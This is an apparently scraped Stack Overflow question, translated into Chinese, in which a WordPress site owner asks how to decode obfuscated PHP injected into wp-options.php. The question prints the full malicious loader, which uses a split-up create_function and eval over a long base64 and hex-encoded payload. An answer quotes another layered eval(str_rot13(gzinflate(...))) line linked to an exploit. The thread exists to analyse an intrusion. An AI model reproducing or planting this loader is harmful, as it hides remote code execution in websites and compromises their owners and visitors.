谁能告诉我如何解码这个php文件[重复]

【问题标题】:Can any one tell me how to decode this php file [duplicate]谁能告诉我如何解码这个php文件[重复]
【发布时间】:2020-10-04 09:45:28
【问题描述】:

我认为有人在我的 wp-options.php 文件中注入了这段代码:

  <?php
 $func="cr"."ea"."te_"."fun"."ction";   $x=$func("\$c","e"."v"."al"."('? 
 >'.base"."64"."_dec"."ode(\$c));");  


$x("PD9waHAgJHsiR1x4NGNceDRmQlx4NDFceDRjUyJ9WyJceDZhXHg2Nlx4NjRceDYxXHg2OGl2anEiXT0iXHg0MVx4NmUwXHg2ZVx4NWYzXHg3OFx4NTBceDZjb1x4NjlceDU0ZVIiOyRyeWh0bmVsaW5sPSJceDU1XHg2NVx4NThwbFx4NmZceDY5VCI7JHsiXHg0N1x4NGNceDRmXHg0Mlx4NDFMXHg1MyJ9WyJ3XHg2N1x4NjN3XHg3YXhceDc1XHg2YVx4N2EiXT0iVWVceDU4cFx4NmNceDZmXHg2OVQiOyR7JHsiXHg0N1x4NGNceDRmXHg0MkFMXHg1MyJ9WyJceDc3Z2NceDc3XHg3YXhceDc1alx4N2EiXX09Ilx4NTNceDc5XHgzMVx4NGNceDdhXHg0ZUZceDUxS1x4NzlceDdhTlx4NGM3XHg0N1x4MzJWMFx4NzNceDc2XHg3M1x4NTlceDU5XHg3N1x4MzlceDU5cFx4NGNceDY5dUtMOGtceDczXHg0ZFx4NmFUXHg1OFx4NTNceDcxXHg3YUx6MG5JXHg1M1MxS1x4NDJyXHg0ZVx4NGJceDM4XHgzNVB6XHg2M1x4NjdxXHg0Y1x4NTVceDM0bVx4NGNxXHg0M1x4NDNceDYzXHg2Y1x4NDZxZVx4NjFceDZkXHg2M1x4NTNuXHg3MFx4NDNceDYyblx4NzBceDM2UnFceDQxXHg0Zlx4MzBzXHg1M1x4NjkzXHg1NFVISFx4NGRNOFx4NjlceDRjXHg0ZVx4MzY0SXlNXHg2ZVx4NTBEXHg0NWtOXHgzMGtceDUxXHg0MzFceDY3XHg0MVx4M2QiOyR7JHsiR1x4NGNPXHg0Mlx4NDFceDRjXHg1MyJ9WyJqXHg2Nlx4NjRhXHg2OFx4Njl2alx4NzEiXX09Ilx4M2RceDNkd1x4NzVceDRmXHg2Y1x4NzVceDUzXHg0Ylx4NjlVXHg0Nlx4MzRceDUxXHg1OFx4NTFceDQxL1x4NDlxNlx4NGRZXHg1NkY4L3lceDZkXHg0OEdceDJiUnZ0XHgzMFx4NTRceDYzNW42XHg2Mk5ceDYxXHg2Zlx4NTdceDYzNVVceDMzXHg2Zm5ceDY0XHg0M1x4NTZceDc4XHg2Y1x4NjZ4Ulx4NTBceDc0XHgzOFx4NTA4XHg0ZC9ceDZkXHg1MFx4NzVceDM2OFx4NzJPXHg3M1x4NzhceDczOVx4NzRceDRiXHg2OVx4NDQ5XHg1M1x4MzlZXHg2Y1RceDYxXHg0Zlx4NDdceDc2aVx4NjhceDVhRFx4MmJMTVx4MzJceDQ0XHg2OFx4NzdceDRiXHg2ZVx4NjFnXHgzMGZceDRlNVx4NjNceDRmXHg0MVx4MzRceDUwXHg1Nlx4NjIvXHg1Nlx4MzQwXHgzNzJceDQ4L1x4NTlceDc5XHg2ZXFceDYyci9ceDY2N2lceDY3XHg2MVx4NjlceDRmXHg3Nlx4NTlPclx4NjhceDY5XHg0ZVNTXHg0Y1x4NTFvXHg2OFx4NTBceDJiL1x4MzJceDJidlFceDQza1x4N2EyXHgzNGV0XHg2MW5ceDQ1XHg2ZVx4NzZceDMzXHgzM0Q1UWlceDYyXHg1M3Y0MFx4MmJceDY2XHg0Y1x4MzNyXHg1N1x4NjNceDM3XHgzNVx4NzBlXHgzNFx4NzVceDMzXHg0Ylx4NjlceDZhWlx4NTBTZFdceDc5OWx3NFx4NDJceDMxTi9ceDQxXHg3NjdceDQxVXRceDQydlx4NDRceDUyXHg3MUxceDc5ZVx4MmJOXHg1YVx4NTQvazJceDcyRVx4NjFceDcyXHg1N25ceDM3SFx4NTlaXHgzMVx4NWFceDU2XHg2NVx4NjlceDc3XHg2Y1x4NmFceDc4XHgzMlx4NjlceDc3XHg2YXptXHg2Mlx4N2FceDVhXHg2MVx4MmJceDM4NVx4NmNETVx4NzVyXHg0N1NceDQ0NERceDY2XHg1OFdceDY3alx4MzFceDc1alx4NDJceDYxXHg1NVx4NjhceDQ1XHg1M1x4NjFceDM3dVx4NTVceDZjXHg0MlVSSks0XHgzMFlceDQyaVx4NjFceDMzSlNceDY0dGtSXHg2M1x4NjgxMnVMXHg3OFx4NDI0Wk10XHg0YXZceDY5XHg0NWZXXHg0Mlx4NDJJMVx4NzlceDQ0XHg1NlVXL1x4NTNceDQ0aFx4NDNlVFx4N2FceDcxXHg0Mlx4NDRceDY2XHgzOHJceDY2XHg0ZTY3XHg0MVx4MzNceDc5ZDBOXHg1N1dxXHg0M2dceDM0XHg0N1x4MzRceDUzXHg0Mlx4NjNceDYyRW9ceDcwUFx4NzNceDcxXHgzMXQvXHg3MTBceDYyUFx4NjlceDQ2R1x4NmZceDY3XHg0Ylx4NDc0XHg0MVx4NGRceDRhXHg0MnpSXHg0ZFx4NmRceDMzM1x4NDdKXHgzNVx4NjVceDZiS1x4NTRceDc4XHg3MVx4NDlZXHg2N0dceDMxSlx4NTVJXHg3MFx4NTQ4ZFx4NThpOTNceDRjLzNceDRmNlx4NzFuNVFceDZmXHg2ZFx4NTVKXHgzMHVSeE1GXHg0MnN0bVNceDc1OFx4NDkvXHg1OUlceDcyNVNRXHgzM1x4MzhoXHg0Mlx4NjM3XHg1OFx4MzJceDY5NElceDVhXHgzMlx4NTRceDY2XHg0Mlx4N2FceDJiNlx4Njl2RFx4NDRceDM2bXJVeVx4NDV1XHg3OXF5XHgzMFx4NWF2XHg0Mlx4NGVceDQ2XHg1OVx4MzdvXHg0MXhvXHg0M1x4NGJceDRjXHg0M1x4MzRceDRiXHg0YXcyXHg2N1x4NjVNXHgzOFx4NzhceDYxXHg2OFx4MzhceDZkXHg0NWRGZjZceDc4N1x4NDRceDYyXHgzNjRceDRiXHg2Ylx4NDFOXHg1N1x4NThLZWZceDQ2XHg2Zlx4NGJYc2xceDQzXHg3M1x4N2FceDQyVllceDc1Rlx4NzQvVFx4NzZceDM4XHgyYlx4NThceDM5SVBwUTRceDczXHg2N2lceDQycVx4NzVceDc1VFx4NGFnWlx4NTNceDMyZVx4NzlIXHg1MHRceDcwXHg3NVx4NzNceDcwXHg0NFx4NTNceDdhVkxkXHg2NFx4NGFceDUyXHgyYlx4NjNceDM1SjNceDY2XHg2ZHpRXHgzMFx4NjNxU1x4NzhceDcyaFx4MmJceDYxXHg3MWtnU1x4MmJ2XHg0YVx4NGJnXHg2Nlx4NGFZXHg0ZVx4N2FceDY1XHg2OVx4NDZ4XHg3OE9ceDc1XHg2Nlx4NThtV1x4NjdWXHg3MFx4NDFceDY3cS9ceDU1XHgzMFx4N2FceDQ0XHg3NFx4NDJMM1x4MzRceDMxUDFceDY3XHg0Mlx4NjhceDU5LzJceDU4XHg1OFx4MzJvXHg3Mlx4NWFceDU2UTFceDYxXHg2OUwzXHg2NVx4NzVceDU5XHg2ZVx4NTNceDM1XHgzME1ceDU5ZFx4NzJKWlx4NTJoUzRceDQyR2pceDQyOVx4NzZkTWxceDQ1S1x4NmVzXHg3NFx4NGFKXHg0YVpQblx4NjlkUVx4NWF5XHg2MWRceDczXHg1Mlx4NzJceDYyXHgzN1x4NzFceDM5XHg3M1x4NmVceDRiVkVceDc5XHg2M2VceDY4XHg3MVx4NDFceDQyXHgzM21tS1RceDJiNVx4NDJceDJiOFg0XHg3NTNmM1NceDM4V3ppXHg0M1x4NzREWmZ2Zlx4NmVceDcxSVdTVFx4NjVtXHg0ZVx4NGZWc0hceDU2XHg0MmtIXHg0Ylx4NTZceDc0XHg1Mlx4NmVceDRjZU5JXHg3NDFceDRheFx4NzFceDUwRlx4NTMzXHg0M1N4XHg0MVx4NmJceDMxXHg0M1x4MzM3XHg0YVx4MmJ3XHg1OEhEXHg0Mk1ceDYxL1dceDYyVDJceDU3L1x4NjNceDRid1x4NTlceDQyd1x4NGFlOUhceDcwXHg0MVx4NzVGUS9NXHg0Ylx4NzdceDYzXHg0Mlx4NzdceDRhZVx4MzlIb1x4NDFceDJiRlx4NTEvOEpceDc3XHg2N1x4NDJ3XHg0YWU5SG5ceDQxT0dceDUxL1x4NzNceDRhXHg3N1x4NmJceDQyd1x4NGFlIjtldmFsKGh0bWxzcGVjaWFsY2hhcnNfZGVjb2RlKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCR7JHJ5aHRuZWxpbmx9KSkpKTtleGl0Owo/Pg==");
 exit;
?>

经过太多次尝试解码后,我才发现这个结果:

<?php

 $x=create_function("\$c","eval(base64_decode(\$c));");
 $x("PD9waHAgJHsiR1x4NGNceDRmQlx4NDFceDRjUyJ9WyJceDZhXHg2Nlx4NjRceDYxXHg2OGl2anEiXT0iXHg0MVx4NmUwXHg2ZVx4NWYzXHg3OFx4NTBceDZjb1x4NjlceDU0ZVIiOyRyeWh0bmVsaW5sPSJceDU1XHg2NVx4NThwbFx4NmZceDY5VCI7JHsiXHg0N1x4NGNceDRmXHg0Mlx4NDFMXHg1MyJ9WyJ3XHg2N1x4NjN3XHg3YXhceDc1XHg2YVx4N2EiXT0iVWVceDU4cFx4NmNceDZmXHg2OVQiOyR7JHsiXHg0N1x4NGNceDRmXHg0MkFMXHg1MyJ9WyJceDc3Z2NceDc3XHg3YXhceDc1alx4N2EiXX09Ilx4NTNceDc5XHgzMVx4NGNceDdhXHg0ZUZceDUxS1x4NzlceDdhTlx4NGM3XHg0N1x4MzJWMFx4NzNceDc2XHg3M1x4NTlceDU5XHg3N1x4MzlceDU5cFx4NGNceDY5dUtMOGtceDczXHg0ZFx4NmFUXHg1OFx4NTNceDcxXHg3YUx6MG5JXHg1M1MxS1x4NDJyXHg0ZVx4NGJceDM4XHgzNVB6XHg2M1x4NjdxXHg0Y1x4NTVceDM0bVx4NGNxXHg0M1x4NDNceDYzXHg2Y1x4NDZxZVx4NjFceDZkXHg2M1x4NTNuXHg3MFx4NDNceDYyblx4NzBceDM2UnFceDQxXHg0Zlx4MzBzXHg1M1x4NjkzXHg1NFVISFx4NGRNOFx4NjlceDRjXHg0ZVx4MzY0SXlNXHg2ZVx4NTBEXHg0NWtOXHgzMGtceDUxXHg0MzFceDY3XHg0MVx4M2QiOyR7JHsiR1x4NGNPXHg0Mlx4NDFceDRjXHg1MyJ9WyJqXHg2Nlx4NjRhXHg2OFx4Njl2alx4NzEiXX09Ilx4M2RceDNkd1x4NzVceDRmXHg2Y1x4NzVceDUzXHg0Ylx4NjlVXHg0Nlx4MzRceDUxXHg1OFx4NTFceDQxL1x4NDlxNlx4NGRZXHg1NkY4L3lceDZkXHg0OEdceDJiUnZ0XHgzMFx4NTRceDYzNW42XHg2Mk5ceDYxXHg2Zlx4NTdceDYzNVVceDMzXHg2Zm5ceDY0XHg0M1x4NTZceDc4XHg2Y1x4NjZ4Ulx4NTBceDc0XHgzOFx4NTA4XHg0ZC9ceDZkXHg1MFx4NzVceDM2OFx4NzJPXHg3M1x4NzhceDczOVx4NzRceDRiXHg2OVx4NDQ5XHg1M1x4MzlZXHg2Y1RceDYxXHg0Zlx4NDdceDc2aVx4NjhceDVhRFx4MmJMTVx4MzJceDQ0XHg2OFx4NzdceDRiXHg2ZVx4NjFnXHgzMGZceDRlNVx4NjNceDRmXHg0MVx4MzRceDUwXHg1Nlx4NjIvXHg1Nlx4MzQwXHgzNzJceDQ4L1x4NTlceDc5XHg2ZXFceDYyci9ceDY2N2lceDY3XHg2MVx4NjlceDRmXHg3Nlx4NTlPclx4NjhceDY5XHg0ZVNTXHg0Y1x4NTFvXHg2OFx4NTBceDJiL1x4MzJceDJidlFceDQza1x4N2EyXHgzNGV0XHg2MW5ceDQ1XHg2ZVx4NzZceDMzXHgzM0Q1UWlceDYyXHg1M3Y0MFx4MmJceDY2XHg0Y1x4MzNyXHg1N1x4NjNceDM3XHgzNVx4NzBlXHgzNFx4NzVceDMzXHg0Ylx4NjlceDZhWlx4NTBTZFdceDc5OWx3NFx4NDJceDMxTi9ceDQxXHg3NjdceDQxVXRceDQydlx4NDRceDUyXHg3MUxceDc5ZVx4MmJOXHg1YVx4NTQvazJceDcyRVx4NjFceDcyXHg1N25ceDM3SFx4NTlaXHgzMVx4NWFceDU2XHg2NVx4NjlceDc3XHg2Y1x4NmFceDc4XHgzMlx4NjlceDc3XHg2YXptXHg2Mlx4N2FceDVhXHg2MVx4MmJceDM4NVx4NmNETVx4NzVyXHg0N1NceDQ0NERceDY2XHg1OFdceDY3alx4MzFceDc1alx4NDJceDYxXHg1NVx4NjhceDQ1XHg1M1x4NjFceDM3dVx4NTVceDZjXHg0MlVSSks0XHgzMFlceDQyaVx4NjFceDMzSlNceDY0dGtSXHg2M1x4NjgxMnVMXHg3OFx4NDI0Wk10XHg0YXZceDY5XHg0NWZXXHg0Mlx4NDJJMVx4NzlceDQ0XHg1NlVXL1x4NTNceDQ0aFx4NDNlVFx4N2FceDcxXHg0Mlx4NDRceDY2XHgzOHJceDY2XHg0ZTY3XHg0MVx4MzNceDc5ZDBOXHg1N1dxXHg0M2dceDM0XHg0N1x4MzRceDUzXHg0Mlx4NjNceDYyRW9ceDcwUFx4NzNceDcxXHgzMXQvXHg3MTBceDYyUFx4NjlceDQ2R1x4NmZceDY3XHg0Ylx4NDc0XHg0MVx4NGRceDRhXHg0MnpSXHg0ZFx4NmRceDMzM1x4NDdKXHgzNVx4NjVceDZiS1x4NTRceDc4XHg3MVx4NDlZXHg2N0dceDMxSlx4NTVJXHg3MFx4NTQ4ZFx4NThpOTNceDRjLzNceDRmNlx4NzFuNVFceDZmXHg2ZFx4NTVKXHgzMHVSeE1GXHg0MnN0bVNceDc1OFx4NDkvXHg1OUlceDcyNVNRXHgzM1x4MzhoXHg0Mlx4NjM3XHg1OFx4MzJceDY5NElceDVhXHgzMlx4NTRceDY2XHg0Mlx4N2FceDJiNlx4Njl2RFx4NDRceDM2bXJVeVx4NDV1XHg3OXF5XHgzMFx4NWF2XHg0Mlx4NGVceDQ2XHg1OVx4MzdvXHg0MXhvXHg0M1x4NGJceDRjXHg0M1x4MzRceDRiXHg0YXcyXHg2N1x4NjVNXHgzOFx4NzhceDYxXHg2OFx4MzhceDZkXHg0NWRGZjZceDc4N1x4NDRceDYyXHgzNjRceDRiXHg2Ylx4NDFOXHg1N1x4NThLZWZceDQ2XHg2Zlx4NGJYc2xceDQzXHg3M1x4N2FceDQyVllceDc1Rlx4NzQvVFx4NzZceDM4XHgyYlx4NThceDM5SVBwUTRceDczXHg2N2lceDQycVx4NzVceDc1VFx4NGFnWlx4NTNceDMyZVx4NzlIXHg1MHRceDcwXHg3NVx4NzNceDcwXHg0NFx4NTNceDdhVkxkXHg2NFx4NGFceDUyXHgyYlx4NjNceDM1SjNceDY2XHg2ZHpRXHgzMFx4NjNxU1x4NzhceDcyaFx4MmJceDYxXHg3MWtnU1x4MmJ2XHg0YVx4NGJnXHg2Nlx4NGFZXHg0ZVx4N2FceDY1XHg2OVx4NDZ4XHg3OE9ceDc1XHg2Nlx4NThtV1x4NjdWXHg3MFx4NDFceDY3cS9ceDU1XHgzMFx4N2FceDQ0XHg3NFx4NDJMM1x4MzRceDMxUDFceDY3XHg0Mlx4NjhceDU5LzJceDU4XHg1OFx4MzJvXHg3Mlx4NWFceDU2UTFceDYxXHg2OUwzXHg2NVx4NzVceDU5XHg2ZVx4NTNceDM1XHgzME1ceDU5ZFx4NzJKWlx4NTJoUzRceDQyR2pceDQyOVx4NzZkTWxceDQ1S1x4NmVzXHg3NFx4NGFKXHg0YVpQblx4NjlkUVx4NWF5XHg2MWRceDczXHg1Mlx4NzJceDYyXHgzN1x4NzFceDM5XHg3M1x4NmVceDRiVkVceDc5XHg2M2VceDY4XHg3MVx4NDFceDQyXHgzM21tS1RceDJiNVx4NDJceDJiOFg0XHg3NTNmM1NceDM4V3ppXHg0M1x4NzREWmZ2Zlx4NmVceDcxSVdTVFx4NjVtXHg0ZVx4NGZWc0hceDU2XHg0MmtIXHg0Ylx4NTZceDc0XHg1Mlx4NmVceDRjZU5JXHg3NDFceDRheFx4NzFceDUwRlx4NTMzXHg0M1N4XHg0MVx4NmJceDMxXHg0M1x4MzM3XHg0YVx4MmJ3XHg1OEhEXHg0Mk1ceDYxL1dceDYyVDJceDU3L1x4NjNceDRid1x4NTlceDQyd1x4NGFlOUhceDcwXHg0MVx4NzVGUS9NXHg0Ylx4NzdceDYzXHg0Mlx4NzdceDRhZVx4MzlIb1x4NDFceDJiRlx4NTEvOEpceDc3XHg2N1x4NDJ3XHg0YWU5SG5ceDQxT0dceDUxL1x4NzNceDRhXHg3N1x4NmJceDQyd1x4NGFlIjtldmFsKGh0bWxzcGVjaWFsY2hhcnNfZGVjb2RlKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCR7JHJ5aHRuZWxpbmx9KSkpKTtleGl0Owo/Pg==");exit;
?>

【问题讨论】:

  • evalecho,冲洗并重复。

标签: php base64 eval decode


【解决方案1】:

这似乎是一个漏洞利用:https://pastebin.com/rp5firhv

eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR))))))))))));

【讨论】:

  • @lllya你是怎么得到这个代码的,这个变量$An0n_3xPloiTeR是从哪里来的,可以看到这个变量的内容吗??
  • @ChihebLoussif 先解码$x(string)里面的字符串,把eval改成echo,就会打印出解码后的代码
  • @lllya thak's that work,那么变量 $An0n_3xPloiTeR 呢,我认为这个变量包含我们可以解密的代码,我在哪里可以找到它,??
  • 尝试回显$An0n_3xPloiTer, echo str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($An0n_3xPloiTeR)))))))))));die;
  • @lllya 它给了我这个错误注意:未定义的变量:An0n_3xPloiTeR
猜你喜欢
  • 1970-01-01
  • 2020-11-14
  • 2014-11-10
  • 2013-06-05
  • 2013-05-29
  • 2016-02-14
  • 2011-01-07
  • 2021-09-09
  • 2021-09-06
相关资源
最近更新 更多
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode